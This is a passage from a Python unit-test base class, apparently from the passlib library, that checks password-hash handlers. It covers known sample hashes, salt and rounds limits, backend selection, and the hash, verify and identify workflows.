# list of (secret, hash) tuples which are known to be correct
known_correct_hashes = []
# list of (config, secret, hash) tuples are known to be correct
known_correct_configs = []
# list of (alt_hash, secret, hash) tuples, where alt_hash is a hash
# using an alternate representation that should be recognized and verify
# correctly, but should be corrected to match hash when passed through
# genhash()
known_alternate_hashes = []
# hashes so malformed they aren't even identified properly
known_unidentified_hashes = []
# hashes which are identifiabled but malformed - they should identify()
# as True, but cause an error when passed to genhash/verify.
known_malformed_hashes = []
# list of (handler name, hash) pairs for other algorithm's hashes that
# handler shouldn't identify as belonging to it this list should generally
# be sufficient (if handler name in list, that entry will be skipped)
known_other_hashes = [
('des_crypt', '6f8c114b58f2c'),
('md5_crypt', '$1$dOHYPKoP$tnxS1T8Q6VVn3kpV8cN6o.'),
('sha512_crypt', "$6$rounds=123456$asaltof16chars..$BtCwjqMJGx5hrJhZywW"
"vt0RLE8uZ4oPwcelCjmw2kSYu.Ec6ycULevoBK25fs2xXgMNrCzIMVcgEJAstJeonj1"),
]
# passwords used to test basic hash behavior - generally
# don't need to be overidden.
stock_passwords = [
u("test"),
u("\u20AC\u00A5$"),
b'\xe2\x82\xac\xc2\xa5$'
]
#---------------------------------------------------------------
# option flags
#---------------------------------------------------------------
# whether hash is case insensitive
# True, False, or special value "verify-only" (which indicates
# hash contains case-sensitive portion, but verifies is case-insensitive)
secret_case_insensitive = False
# flag if scheme accepts ALL hash strings (e.g. plaintext)
accepts_all_hashes = False
# flag if scheme has "is_disabled" set, and contains 'salted' data
disabled_contains_salt = False
# flag/hack to filter PasslibHashWarning issued by test_72_configs()
filter_config_warnings = False
# forbid certain characters in passwords
@classproperty
def forbidden_characters(cls):
# anything that supports crypt() interface should forbid null chars,
# since crypt() uses null-terminated strings.
if 'os_crypt' in getattr(cls.handler, "backends", ()):
return b"\x00"
return None
#===================================================================
# internal class attrs
#===================================================================
__unittest_skip = True
@property
def descriptionPrefix(self):
handler = self.handler
name = handler.name
if hasattr(handler, "get_backend"):
name += " (%s backend)" % (handler.get_backend(),)
return name
#===================================================================
# support methods
#===================================================================
#---------------------------------------------------------------
# configuration helpers
#---------------------------------------------------------------
@classmethod
def iter_known_hashes(cls):
"""iterate through known (secret, hash) pairs"""
for secret, hash in cls.known_correct_hashes:
yield secret, hash
for config, secret, hash in cls.known_correct_configs:
yield secret, hash
for alt, secret, hash in cls.known_alternate_hashes:
yield secret, hash
def get_sample_hash(self):
"""test random sample secret/hash pair"""
known = list(self.iter_known_hashes())
return self.getRandom().choice(known)
#---------------------------------------------------------------
# test helpers
#---------------------------------------------------------------
def check_verify(self, secret, hash, msg=None, negate=False):
"""helper to check verify() outcome, honoring is_disabled_handler"""
result = self.do_verify(secret, hash)
self.assertTrue(result is True or result is False,
"verify() returned non-boolean value: %r" % (result,))
if self.handler.is_disabled or negate:
if not result:
return
if not msg:
msg = ("verify incorrectly returned True: secret=%r, hash=%r" %
(secret, hash))
raise self.failureException(msg)
else:
if result:
return
if not msg:
msg = "verify failed: secret=%r, hash=%r" % (secret, hash)
raise self.failureException(msg)
def check_returned_native_str(self, result, func_name):
self.assertIsInstance(result, str,
"%s() failed to return native string: %r" % (func_name, result,))
#---------------------------------------------------------------
# PasswordHash helpers - wraps all calls to PasswordHash api,
# so that subclasses can fill in defaults and account for other specialized behavior
#---------------------------------------------------------------
def populate_settings(self, kwds):
"""subclassable method to populate default settings"""
# use lower rounds settings for certain test modes
handler = self.handler
if 'rounds' in handler.setting_kwds and 'rounds' not in kwds:
mn = handler.min_rounds
df = handler.default_rounds
if TEST_MODE(max="quick"):
# use minimum rounds for quick mode
kwds['rounds'] = max(3, mn)
else:
# use default/16 otherwise
factor = 3
if getattr(handler, "rounds_cost", None) == "log2":
df -= factor
else:
df //= (1<<factor)
kwds['rounds'] = max(3, mn, df)
def populate_context(self, secret, kwds):
"""subclassable method allowing 'secret' to be encode context kwds"""
return secret
# TODO: rename to do_hash() to match new API
def do_encrypt(self, secret, use_encrypt=False, handler=None, context=None, **settings):
"""call handler's hash() method with specified options"""
self.populate_settings(settings)
if context is None:
context = {}
secret = self.populate_context(secret, context)
if use_encrypt:
# use legacy 1.6 api
warnings = []
if settings:
context.update(**settings)
warnings.append("passing settings to.*is deprecated")
with self.assertWarningList(warnings):
return (handler or self.handler).encrypt(secret, **context)
else:
# use 1.7 api
return (handler or self.handler).using(**settings).hash(secret, **context)
def do_verify(self, secret, hash, handler=None, **kwds):
"""call handler's verify method"""
secret = self.populate_context(secret, kwds)
return (handler or self.handler).verify(secret, hash, **kwds)
def do_identify(self, hash):
"""call handler's identify method"""
return self.handler.identify(hash)
def do_genconfig(self, **kwds):
"""call handler's genconfig method with specified options"""
self.populate_settings(kwds)
return self.handler.genconfig(**kwds)
def do_genhash(self, secret, config, **kwds):
"""call handler's genhash method with specified options"""
secret = self.populate_context(secret, kwds)
return self.handler.genhash(secret, config, **kwds)
def do_stub_encrypt(self, handler=None, context=None, **settings):
"""
return sample hash for handler, w/o caring if digest is valid
(uses some monkeypatching to minimize digest calculation cost)
"""
handler = (handler or self.handler).using(**settings)
if context is None:
context = {}
secret = self.populate_context("", context)
with patch_calc_min_rounds(handler):
return handler.hash(secret, **context)
#---------------------------------------------------------------
# automatically generate subclasses for testing specific backends,
# and other backend helpers
#---------------------------------------------------------------
BACKEND_NOT_AVAILABLE = "backend not available"
@classmethod
def _get_skip_backend_reason(cls, backend):
"""
helper for create_backend_case() --
returns reason to skip backend, or None if backend should be tested
"""
handler = cls.handler
if not is_default_backend(handler, backend) and not TEST_MODE("full"):
return "only default backend is being tested"
if handler.has_backend(backend):
return None
return cls.BACKEND_NOT_AVAILABLE
@classmethod
def create_backend_case(cls, backend):
handler = cls.handler
name = handler.name
assert hasattr(handler, "backends"), "handler must support uh.HasManyBackends protocol"
assert backend in handler.backends, "unknown backend: %r" % (backend,)
bases = (cls,)
if backend == "os_crypt":
bases += (OsCryptMixin,)
subcls = type(
"%s_%s_test" % (name, backend),
bases,
dict(
descriptionPrefix="%s (%s backend)" % (name, backend),
backend=backend,
__module__=cls.__module__,
)
)
skip_reason = cls._get_skip_backend_reason(backend)
if skip_reason:
subcls = skip(skip_reason)(subcls)
return subcls
#===================================================================
# setup
#===================================================================
def setUp(self):
super(HandlerCase, self).setUp()
# if needed, select specific backend for duration of test
handler = self.handler
backend = self.backend
if backend:
if not hasattr(handler, "set_backend"):
raise RuntimeError("handler doesn't support multiple backends")
self.addCleanup(handler.set_backend, handler.get_backend())
handler.set_backend(backend)
# patch some RNG references so they're reproducible.
from passlib.utils import handlers
self.patchAttr(handlers, "rng", self.getRandom("salt generator"))
#===================================================================
# basic tests
#===================================================================
def test_01_required_attributes(self):
"""validate required attributes"""
handler = self.handler
def ga(name):
return getattr(handler, name, None)
#
# name should be a str, and valid
#
name = ga("name")
self.assertTrue(name, "name not defined:")
self.assertIsInstance(name, str, "name must be native str")
self.assertTrue(name.lower() == name, "name not lower-case:")
self.assertTrue(re.match("^[a-z0-9_]+$", name),
"name must be alphanum + underscore: %r" % (name,))
#
# setting_kwds should be specified
#
settings = ga("setting_kwds")
self.assertTrue(settings is not None, "setting_kwds must be defined:")
self.assertIsInstance(settings, tuple, "setting_kwds must be a tuple:")
#
# context_kwds should be specified
#
context = ga("context_kwds")
self.assertTrue(context is not None, "context_kwds must be defined:")
self.assertIsInstance(context, tuple, "context_kwds must be a tuple:")
# XXX: any more checks needed?
def test_02_config_workflow(self):
"""test basic config-string workflow
this tests that genconfig() returns the expected types,
and that identify() and genhash() handle the result correctly.
"""
#
# genconfig() should return native string.
# NOTE: prior to 1.7 could return None, but that's no longer allowed.
#
config = self.do_genconfig()
self.check_returned_native_str(config, "genconfig")
#
# genhash() should always accept genconfig()'s output,
# whether str OR None.
#
result = self.do_genhash('stub', config)
self.check_returned_native_str(result, "genhash")
#
# verify() should never accept config strings
#
# NOTE: changed as of 1.7 -- previously, .verify() should have
# rejected partial config strings returned by genconfig().
# as of 1.7, that feature is deprecated, and genconfig()
# always returns a hash (usually of the empty string)
# so verify should always accept it's output
self.do_verify('', config) # usually true, but not required by protocol
#
# identify() should positively identify config strings if not None.
#
# NOTE: changed as of 1.7 -- genconfig() previously might return None,
# now must always return valid hash
self.assertTrue(self.do_identify(config),
"identify() failed to identify genconfig() output: %r" %
(config,))
def test_02_using_workflow(self):
"""test basic using() workflow"""
handler = self.handler
subcls = handler.using()
self.assertIsNot(subcls, handler)
self.assertEqual(subcls.name, handler.name)
# NOTE: other info attrs should match as well, just testing basic behavior.
# NOTE: mixin-specific args like using(min_rounds=xxx) tested later.
def test_03_hash_workflow(self, use_16_legacy=False):
"""test basic hash-string workflow.
this tests that hash()'s hashes are accepted
by verify() and identify(), and regenerated correctly by genhash().
the test is run against a couple of different stock passwords.
"""
wrong_secret = 'stub'
for secret in self.stock_passwords:
#
# hash() should generate native str hash
#
result = self.do_encrypt(secret, use_encrypt=use_16_legacy)
self.check_returned_native_str(result, "hash")
#
# verify() should work only against secret
#
self.check_verify(secret, result)
self.check_verify(wrong_secret, result, negate=True)
#
# genhash() should reproduce original hash
#
other = self.do_genhash(secret, result)
self.check_returned_native_str(other, "genhash")
if self.handler.is_disabled and self.disabled_contains_salt:
self.assertNotEqual(other, result, "genhash() failed to salt result "
"hash: secret=%r hash=%r: result=%r" %
(secret, result, other))
else:
self.assertEqual(other, result, "genhash() failed to reproduce "
"hash: secret=%r hash=%r: result=%r" %
(secret, result, other))
#
# genhash() should NOT reproduce original hash for wrong password
#
other = self.do_genhash(wrong_secret, result)
self.check_returned_native_str(other, "genhash")
if self.handler.is_disabled and not self.disabled_contains_salt:
self.assertEqual(other, result, "genhash() failed to reproduce "
"disabled-hash: secret=%r hash=%r other_secret=%r: result=%r" %
(secret, result, wrong_secret, other))
else:
self.assertNotEqual(other, result, "genhash() duplicated "
"hash: secret=%r hash=%r wrong_secret=%r: result=%r" %
(secret, result, wrong_secret, other))
#
# identify() should positively identify hash
#
self.assertTrue(self.do_identify(result))
def test_03_legacy_hash_workflow(self):
"""test hash-string workflow with legacy .encrypt() & .genhash() methods"""
self.test_03_hash_workflow(use_16_legacy=True)
def test_04_hash_types(self):
"""test hashes can be unicode or bytes"""
# this runs through workflow similar to 03, but wraps
# everything using tonn() so we test unicode under py2,
# and bytes under py3.
# hash using non-native secret
result = self.do_encrypt(tonn('stub'))
self.check_returned_native_str(result, "hash")
# verify using non-native hash
self.check_verify('stub', tonn(result))
# verify using non-native hash AND secret
self.check_verify(tonn('stub'), tonn(result))
# genhash using non-native hash
other = self.do_genhash('stub', tonn(result))
self.check_returned_native_str(other, "genhash")
if self.handler.is_disabled and self.disabled_contains_salt:
self.assertNotEqual(other, result)
else:
self.assertEqual(other, result)
# genhash using non-native hash AND secret
other = self.do_genhash(tonn('stub'), tonn(result))
self.check_returned_native_str(other, "genhash")
if self.handler.is_disabled and self.disabled_contains_salt:
self.assertNotEqual(other, result)
else:
self.assertEqual(other, result)
# identify using non-native hash
self.assertTrue(self.do_identify(tonn(result)))
def test_05_backends(self):
"""test multi-backend support"""
# check that handler supports multiple backends
handler = self.handler
if not hasattr(handler, "set_backend"):
raise self.skipTest("handler only has one backend")
# add cleanup func to restore old backend
self.addCleanup(handler.set_backend, handler.get_backend())
# run through each backend, make sure it works
for backend in handler.backends:
#
# validate backend name
#
self.assertIsInstance(backend, str)
self.assertNotIn(backend, RESERVED_BACKEND_NAMES,
"invalid backend name: %r" % (backend,))
#
# ensure has_backend() returns bool value
#
ret = handler.has_backend(backend)
if ret is True:
# verify backend can be loaded
handler.set_backend(backend)
self.assertEqual(handler.get_backend(), backend)
elif ret is False:
# verify backend CAN'T be loaded
self.assertRaises(MissingBackendError, handler.set_backend,
backend)
else:
# didn't return boolean object. commonly fails due to
# use of 'classmethod' decorator instead of 'classproperty'
raise TypeError("has_backend(%r) returned invalid "
"value: %r" % (backend, ret))
#===================================================================
# salts
#===================================================================
def require_salt(self):
if 'salt' not in self.handler.setting_kwds:
raise self.skipTest("handler doesn't have salt")
def require_salt_info(self):
self.require_salt()
if not has_salt_info(self.handler):
raise self.skipTest("handler doesn't provide salt info")
def test_10_optional_salt_attributes(self):
"""validate optional salt attributes"""
self.require_salt_info()
AssertionError = self.failureException
cls = self.handler
# check max_salt_size
mx_set = (cls.max_salt_size is not None)
if mx_set and cls.max_salt_size < 1:
raise AssertionError("max_salt_chars must be >= 1")
# check min_salt_size
if cls.min_salt_size < 0:
raise AssertionError("min_salt_chars must be >= 0")
if mx_set and cls.min_salt_size > cls.max_salt_size:
raise AssertionError("min_salt_chars must be <= max_salt_chars")
# check default_salt_size
if cls.default_salt_size < cls.min_salt_size:
raise AssertionError("default_salt_size must be >= min_salt_size")
if mx_set and cls.default_salt_size > cls.max_salt_size:
raise AssertionError("default_salt_size must be <= max_salt_size")
# check for 'salt_size' keyword
# NOTE: skipping warning if default salt size is already maxed out
# (might change that in future)
if 'salt_size' not in cls.setting_kwds and (not mx_set or cls.default_salt_size < cls.max_salt_size):
warn('%s: hash handler supports range of salt sizes, '
'but doesn\'t offer \'salt_size\' setting' % (cls.name,))
# check salt_chars & default_salt_chars
if cls.salt_chars:
if not cls.default_salt_chars:
raise AssertionError("default_salt_chars must not be empty")
for c in cls.default_salt_chars:
if c not in cls.salt_chars:
raise AssertionError("default_salt_chars must be subset of salt_chars: %r not in salt_chars" % (c,))
else:
if not cls.default_salt_chars:
raise AssertionError("default_salt_chars MUST be specified if salt_chars is empty")
@property
def salt_bits(self):
"""calculate number of salt bits in hash"""
# XXX: replace this with bitsize() method?
handler = self.handler
assert has_salt_info(handler), "need explicit bit-size for " + handler.name
from math import log
# FIXME: this may be off for case-insensitive hashes, but that accounts
# for ~1 bit difference, which is good enough for test_11()
return int(handler.default_salt_size *
log(len(handler.default_salt_chars), 2))
def test_11_unique_salt(self):
"""test hash() / genconfig() creates new salt each time"""
self.require_salt()
# odds of picking 'n' identical salts at random is '(.5**salt_bits)**n'.
# we want to pick the smallest N needed s.t. odds are <1/10**d, just
# to eliminate false-positives. which works out to n>3.33+d-salt_bits.
# for 1/1e12 odds, n=1 is sufficient for most hashes, but a few border cases (e.g.
# cisco_type7) have < 16 bits of salt, requiring more.
samples = max(1, 4 + 12 - self.salt_bits)
def sampler(func):
value1 = func()
for _ in irange(samples):
value2 = func()
if value1 != value2:
return
raise self.failureException("failed to find different salt after "
"%d samples" % (samples,))
sampler(self.do_genconfig)
sampler(lambda: self.do_encrypt("stub"))
def test_12_min_salt_size(self):
"""test hash() / genconfig() honors min_salt_size"""
self.require_salt_info()
handler = self.handler
salt_char = handler.salt_chars[0:1]
min_size = handler.min_salt_size
#
# check min is accepted
#
s1 = salt_char * min_size
self.do_genconfig(salt=s1)
self.do_encrypt('stub', salt_size=min_size)
#
# check min-1 is rejected
#
if min_size > 0:
self.assertRaises(ValueError, self.do_genconfig,
salt=s1[:-1])
self.assertRaises(ValueError, self.do_encrypt, 'stub',
salt_size=min_size-1)
def test_13_max_salt_size(self):
"""test hash() / genconfig() honors max_salt_size"""
self.require_salt_info()
handler = self.handler
max_size = handler.max_salt_size
salt_char = handler.salt_chars[0:1]
# NOTE: skipping this for hashes like argon2 since max_salt_size takes WAY too much memory
if max_size is None or max_size > (1 << 20):
#
# if it's not set, salt should never be truncated; so test it
# with an unreasonably large salt.
#
s1 = salt_char * 1024
c1 = self.do_stub_encrypt(salt=s1)
c2 = self.do_stub_encrypt(salt=s1 + salt_char)
self.assertNotEqual(c1, c2)
self.do_stub_encrypt(salt_size=1024)
else:
#
# check max size is accepted
#
s1 = salt_char * max_size
c1 = self.do_stub_encrypt(salt=s1)
self.do_stub_encrypt(salt_size=max_size)
#
# check max size + 1 is rejected
#
s2 = s1 + salt_char
self.assertRaises(ValueError, self.do_stub_encrypt, salt=s2)
self.assertRaises(ValueError, self.do_stub_encrypt, salt_size=max_size + 1)
#
# should accept too-large salt in relaxed mode
#
if has_relaxed_setting(handler):
with warnings.catch_warnings(record=True): # issues passlibhandlerwarning
c2 = self.do_stub_encrypt(salt=s2, relaxed=True)
self.assertEqual(c2, c1)
#
# if min_salt supports it, check smaller than mx is NOT truncated
#
if handler.min_salt_size < max_size:
c3 = self.do_stub_encrypt(salt=s1[:-1])
self.assertNotEqual(c3, c1)
# whether salt should be passed through bcrypt repair function
fuzz_salts_need_bcrypt_repair = False
def prepare_salt(self, salt):
"""prepare generated salt"""
if self.fuzz_salts_need_bcrypt_repair:
from passlib.utils.binary import bcrypt64
salt = bcrypt64.repair_unused(salt)
return salt
def test_14_salt_chars(self):
"""test hash() honors salt_chars"""
self.require_salt_info()
handler = self.handler
mx = handler.max_salt_size
mn = handler.min_salt_size
cs = handler.salt_chars
raw = isinstance(cs, bytes)
# make sure all listed chars are accepted
for salt in batch(cs, mx or 32):
if len(salt) < mn:
salt = repeat_string(salt, mn)
salt = self.prepare_salt(salt)
self.do_stub_encrypt(salt=salt)
# check some invalid salt chars, make sure they're rejected
source = u('\x00\xff')
if raw:
source = source.encode("latin-1")
chunk = max(mn, 1)
for c in source:
if c not in cs:
self.assertRaises(ValueError, self.do_stub_encrypt, salt=c*chunk,
__msg__="invalid salt char %r:" % (c,))
@property
def salt_type(self):
"""hack to determine salt keyword's datatype"""
# NOTE: cisco_type7 uses 'int'
if getattr(self.handler, "_salt_is_bytes", False):
return bytes
else:
return unicode
def test_15_salt_type(self):
"""test non-string salt values"""
self.require_salt()
salt_type = self.salt_type
salt_size = getattr(self.handler, "min_salt_size", 0) or 8
# should always throw error for random class.
class fake(object):
pass
self.assertRaises(TypeError, self.do_encrypt, 'stub', salt=fake())
# unicode should be accepted only if salt_type is unicode.
if salt_type is not unicode:
self.assertRaises(TypeError, self.do_encrypt, 'stub', salt=u('x') * salt_size)
# bytes should be accepted only if salt_type is bytes,
# OR if salt type is unicode and running PY2 - to allow native strings.
if not (salt_type is bytes or (PY2 and salt_type is unicode)):
self.assertRaises(TypeError, self.do_encrypt, 'stub', salt=b'x' * salt_size)
def test_using_salt_size(self):
"""Handler.using() -- default_salt_size"""
self.require_salt_info()
handler = self.handler
mn = handler.min_salt_size
mx = handler.max_salt_size
df = handler.default_salt_size
# should prevent setting below handler limit
self.assertRaises(ValueError, handler.using, default_salt_size=-1)
with self.assertWarningList([PasslibHashWarning]):
temp = handler.using(default_salt_size=-1, relaxed=True)
self.assertEqual(temp.default_salt_size, mn)
# should prevent setting above handler limit
if mx:
self.assertRaises(ValueError, handler.using, default_salt_size=mx+1)
with self.assertWarningList([PasslibHashWarning]):
temp = handler.using(default_salt_size=mx+1, relaxed=True)
self.assertEqual(temp.default_salt_size, mx)
# try setting to explicit value
if mn != mx:
temp = handler.using(default_salt_size=mn+1)
self.assertEqual(temp.default_salt_size, mn+1)
self.assertEqual(handler.default_salt_size, df)
temp = handler.using(default_salt_size=mn+2)
self.assertEqual(temp.default_salt_size, mn+2)
self.assertEqual(handler.default_salt_size, df)
# accept strings
if mn == mx:
ref = mn
else:
ref = mn + 1
temp = handler.using(default_salt_size=str(ref))
self.assertEqual(temp.default_salt_size, ref)
# reject invalid strings
self.assertRaises(ValueError, handler.using, default_salt_size=str(ref) + "xxx")
# honor 'salt_size' alias
temp = handler.using(salt_size=ref)
self.assertEqual(temp.default_salt_size, ref)
#===================================================================
# rounds
#===================================================================
def require_rounds_info(self):
if not has_rounds_info(self.handler):
raise self.skipTest("handler lacks rounds attributes")
def test_20_optional_rounds_attributes(self):
"""validate optional rounds attributes"""
self.require_rounds_info()
cls = self.handler
AssertionError = self.failureException
# check max_rounds
if cls.max_rounds is None:
raise AssertionError("max_rounds not specified")
if cls.max_rounds < 1:
raise AssertionError("max_rounds must be >= 1")
# check min_rounds
if cls.min_rounds < 0:
raise AssertionError("min_rounds must be >= 0")
if cls.min_rounds > cls.max_rounds:
raise AssertionError("min_rounds must be <= max_rounds")
# check default_rounds
if cls.default_rounds is not None:
if cls.default_rounds < cls.min_rounds:
raise AssertionError("default_rounds must be >= min_rounds")
if cls.default_rounds > cls.max_rounds:
raise AssertionError("default_rounds must be <= max_rounds")
# check rounds_cost
if cls.rounds_cost not in rounds_cost_values:
raise AssertionError("unknown rounds cost constant: %r" % (cls.rounds_cost,))
def test_21_min_rounds(self):
"""test hash() / genconfig() honors min_rounds"""
self.require_rounds_info()
handler = self.handler
min_rounds = handler.min_rounds
# check min is accepted
self.do_genconfig(rounds=min_rounds)
self.do_encrypt('stub', rounds=min_rounds)
# check min-1 is rejected
self.assertRaises(ValueError, self.do_genconfig, rounds=min_rounds-1)
self.assertRaises(ValueError, self.do_encrypt, 'stub', rounds=min_rounds-1)
# TODO: check relaxed mode clips min-1
def test_21b_max_rounds(self):
"""test hash() / genconfig() honors max_rounds"""
self.require_rounds_info()
handler = self.handler
max_rounds = handler.max_rounds
if max_rounds is not None:
# check max+1 is rejected
self.assertRaises(ValueError, self.do_genconfig, rounds=max_rounds+1)
self.assertRaises(ValueError, self.do_encrypt, 'stub', rounds=max_rounds+1)
# handle max rounds
if max_rounds is None:
self.do_stub_encrypt(rounds=(1 << 31) - 1)
else:
self.do_stub_encrypt(rounds=max_rounds)
# TODO: check relaxed mode clips max+1
#--------------------------------------------------------------------------------------
# HasRounds.using() / .needs_update() -- desired rounds limits
#--------------------------------------------------------------------------------------
def _create_using_rounds_helper(self):
"""
setup test helpers for testing handler.using()'s rounds parameters.
"""
self.require_rounds_info()
handler = self.handler
if handler.name == "bsdi_crypt":
# hack to bypass bsdi-crypt's "odd rounds only" behavior, messes up this test
orig_handler = handler
handler = handler.using()
handler._generate_rounds = classmethod(lambda cls: super(orig_handler, cls)._generate_rounds())
# create some fake values to test with
orig_min_rounds = handler.min_rounds
orig_max_rounds = handler.max_rounds
orig_default_rounds = handler.default_rounds
medium = ((orig_max_rounds or 9999) + orig_min_rounds) // 2
if medium == orig_default_rounds:
medium += 1
small = (orig_min_rounds + medium) // 2
large = ((orig_max_rounds or 9999) + medium) // 2
if handler.name == "bsdi_crypt":
# hack to avoid even numbered rounds
small |= 1
medium |= 1
large |= 1
adj = 2
else:
adj = 1
# create a subclass with small/medium/large as new default desired values
with self.assertWarningList([]):
subcls = handler.using(
min_desired_rounds=small,
max_desired_rounds=large,
default_rounds=medium,
)
# return helpers
return handler, subcls, small, medium, large, adj
def test_has_rounds_using_harness(self):
"""
HasRounds.using() -- sanity check test harness
"""
# setup helpers
self.require_rounds_info()
handler = self.handler
orig_min_rounds = handler.min_rounds
orig_max_rounds = handler.max_rounds
orig_default_rounds = handler.default_rounds
handler, subcls, small, medium, large, adj = self._create_using_rounds_helper()
# shouldn't affect original handler at all
self.assertEqual(handler.min_rounds, orig_min_rounds)
self.assertEqual(handler.max_rounds, orig_max_rounds)
self.assertEqual(handler.min_desired_rounds, None)
self.assertEqual(handler.max_desired_rounds, None)
self.assertEqual(handler.default_rounds, orig_default_rounds)
# should affect subcls' desired value, but not hard min/max
self.assertEqual(subcls.min_rounds, orig_min_rounds)
self.assertEqual(subcls.max_rounds, orig_max_rounds)
self.assertEqual(subcls.default_rounds, medium)
self.assertEqual(subcls.min_desired_rounds, small)
self.assertEqual(subcls.max_desired_rounds, large)
def test_has_rounds_using_w_min_rounds(self):
"""
HasRounds.using() -- min_rounds / min_desired_rounds
"""
# setup helpers
handler, subcls, small, medium, large, adj = self._create_using_rounds_helper()
orig_min_rounds = handler.min_rounds
orig_max_rounds = handler.max_rounds
orig_default_rounds = handler.default_rounds
# .using() should clip values below valid minimum, w/ warning
if orig_min_rounds > 0:
self.assertRaises(ValueError, handler.using, min_desired_rounds=orig_min_rounds - adj)
with self.assertWarningList([PasslibHashWarning]):
temp = handler.using(min_desired_rounds=orig_min_rounds - adj, relaxed=True)
self.assertEqual(temp.min_desired_rounds, orig_min_rounds)
# .using() should clip values above valid maximum, w/ warning
if orig_max_rounds:
self.assertRaises(ValueError, handler.using, min_desired_rounds=orig_max_rounds + adj)
with self.assertWarningList([PasslibHashWarning]):
temp = handler.using(min_desired_rounds=orig_max_rounds + adj, relaxed=True)
self.assertEqual(temp.min_desired_rounds, orig_max_rounds)
# .using() should allow values below previous desired minimum, w/o warning
with self.assertWarningList([]):
temp = subcls.using(min_desired_rounds=small - adj)
self.assertEqual(temp.min_desired_rounds, small - adj)
# .using() should allow values w/in previous range
temp = subcls.using(min_desired_rounds=small + 2 * adj)
self.assertEqual(temp.min_desired_rounds, small + 2 * adj)
# .using() should allow values above previous desired maximum, w/o warning
with self.assertWarningList([]):
temp = subcls.using(min_desired_rounds=large + adj)
self.assertEqual(temp.min_desired_rounds, large + adj)
# hash() etc should allow explicit values below desired minimum
# NOTE: formerly issued a warning in passlib 1.6, now just a wrapper for .using()
self.assertEqual(get_effective_rounds(subcls, small + adj), small + adj)
self.assertEqual(get_effective_rounds(subcls, small), small)
with self.assertWarningList([]):
self.assertEqual(get_effective_rounds(subcls, small - adj), small - adj)
# 'min_rounds' should be treated as alias for 'min_desired_rounds'
temp = handler.using(min_rounds=small)
self.assertEqual(temp.min_desired_rounds, small)
# should be able to specify strings
temp = handler.using(min_rounds=str(small))
self.assertEqual(temp.min_desired_rounds, small)
# invalid strings should cause error
self.assertRaises(ValueError, handler.using, min_rounds=str(small) + "xxx")
def test_has_rounds_replace_w_max_rounds(self):
"""
HasRounds.using() -- max_rounds / max_desired_rounds
"""
# setup helpers
handler, subcls, small, medium, large, adj = self._create_using_rounds_helper()
orig_min_rounds = handler.min_rounds
orig_max_rounds = handler.max_rounds
# .using() should clip values below valid minimum w/ warning
if orig_min_rounds > 0:
self.assertRaises(ValueError, handler.using, max_desired_rounds=orig_min_rounds - adj)
with self.assertWarningList([PasslibHashWarning]):
temp = handler.using(max_desired_rounds=orig_min_rounds - adj, relaxed=True)
self.assertEqual(temp.max_desired_rounds, orig_min_rounds)
# .using() should clip values above valid maximum, w/ warning
if orig_max_rounds:
self.assertRaises(ValueError, handler.using, max_desired_rounds=orig_max_rounds + adj)
with self.assertWarningList([PasslibHashWarning]):
temp = handler.using(max_desired_rounds=orig_max_rounds + adj, relaxed=True)
self.assertEqual(temp.max_desired_rounds, orig_max_rounds)
# .using() should clip values below previous minimum, w/ warning
with self.assertWarningList([PasslibConfigWarning]):
temp = subcls.using(max_desired_rounds=small - adj)
self.assertEqual(temp.max_desired_rounds, small)
# .using() should reject explicit min > max
self.assertRaises(ValueError, subcls.using,
min_desired_rounds=medium+adj,
max_desired_rounds=medium-adj)
# .using() should allow values w/in previous range
temp = subcls.using(min_desired_rounds=large - 2 * adj)
self.assertEqual(temp.min_desired_rounds, large - 2 * adj)
# .using() should allow values above previous desired maximum, w/o warning
with self.assertWarningList([]):
temp = subcls.using(max_desired_rounds=large + adj)
self.assertEqual(temp.max_desired_rounds, large + adj)
# hash() etc should allow explicit values above desired minimum, w/o warning
# NOTE: formerly issued a warning in passlib 1.6, now just a wrapper for .using()
self.assertEqual(get_effective_rounds(subcls, large - adj), large - adj)
self.assertEqual(get_effective_rounds(subcls, large), large)
with self.assertWarningList([]):
self.assertEqual(get_effective_rounds(subcls, large + adj), large + adj)
# 'max_rounds' should be treated as alias for 'max_desired_rounds'
temp = handler.using(max_rounds=large)
self.assertEqual(temp.max_desired_rounds, large)
# should be able to specify strings
temp = handler.using(max_desired_rounds=str(large))
self.assertEqual(temp.max_desired_rounds, large)
# invalid strings should cause error
self.assertRaises(ValueError, handler.using, max_desired_rounds=str(large) + "xxx")
def test_has_rounds_using_w_default_rounds(self):
"""
HasRounds.using() -- default_rounds
"""
# setup helpers
handler, subcls, small, medium, large, adj = self._create_using_rounds_helper()
orig_max_rounds = handler.max_rounds
# XXX: are there any other cases that need testing?
# implicit default rounds -- increase to min_rounds
temp = subcls.using(min_rounds=medium+adj)
self.assertEqual(temp.default_rounds, medium+adj)
# implicit default rounds -- decrease to max_rounds
temp = subcls.using(max_rounds=medium-adj)
self.assertEqual(temp.default_rounds, medium-adj)
# explicit default rounds below desired minimum
# XXX: make this a warning if min is implicit?
self.assertRaises(ValueError, subcls.using, default_rounds=small-adj)
# explicit default rounds above desired maximum
# XXX: make this a warning if max is implicit?
if orig_max_rounds:
self.assertRaises(ValueError, subcls.using, default_rounds=large+adj)
# hash() etc should implicit default rounds, but get overridden
self.assertEqual(get_effective_rounds(subcls), medium)
self.assertEqual(get_effective_rounds(subcls, medium+adj), medium+adj)
# should be able to specify strings
temp = handler.using(default_rounds=str(medium))
self.assertEqual(temp.default_rounds, medium)
# invalid strings should cause error
self.assertRaises(ValueError, handler.using, default_rounds=str(medium) + "xxx")
def test_has_rounds_using_w_rounds(self):
"""
HasRounds.using() -- rounds
"""
# setup helpers
handler, subcls, small, medium, large, adj = self._create_using_rounds_helper()
orig_max_rounds = handler.max_rounds
# 'rounds' should be treated as fallback for min, max, and default
temp = subcls.using(rounds=medium+adj)
self.assertEqual(temp.min_desired_rounds, medium+adj)
self.assertEqual(temp.default_rounds, medium+adj)
self.assertEqual(temp.max_desired_rounds, medium+adj)
# 'rounds' should be treated as fallback for min, max, and default
temp = subcls.using(rounds=medium+1, min_rounds=small+adj,
default_rounds=medium, max_rounds=large-adj)
self.assertEqual(temp.min_desired_rounds, small+adj)
self.assertEqual(temp.default_rounds, medium)
self.assertEqual(temp.max_desired_rounds, large-adj)
def test_has_rounds_using_w_vary_rounds_parsing(self):
"""
HasRounds.using() -- vary_rounds parsing
"""
# setup helpers
handler, subcls, small, medium, large, adj = self._create_using_rounds_helper()
def parse(value):
return subcls.using(vary_rounds=value).vary_rounds
# floats should be preserved
self.assertEqual(parse(0.1), 0.1)
self.assertEqual(parse('0.1'), 0.1)
# 'xx%' should be converted to float
self.assertEqual(parse('10%'), 0.1)
# ints should be preserved
self.assertEqual(parse(1000), 1000)
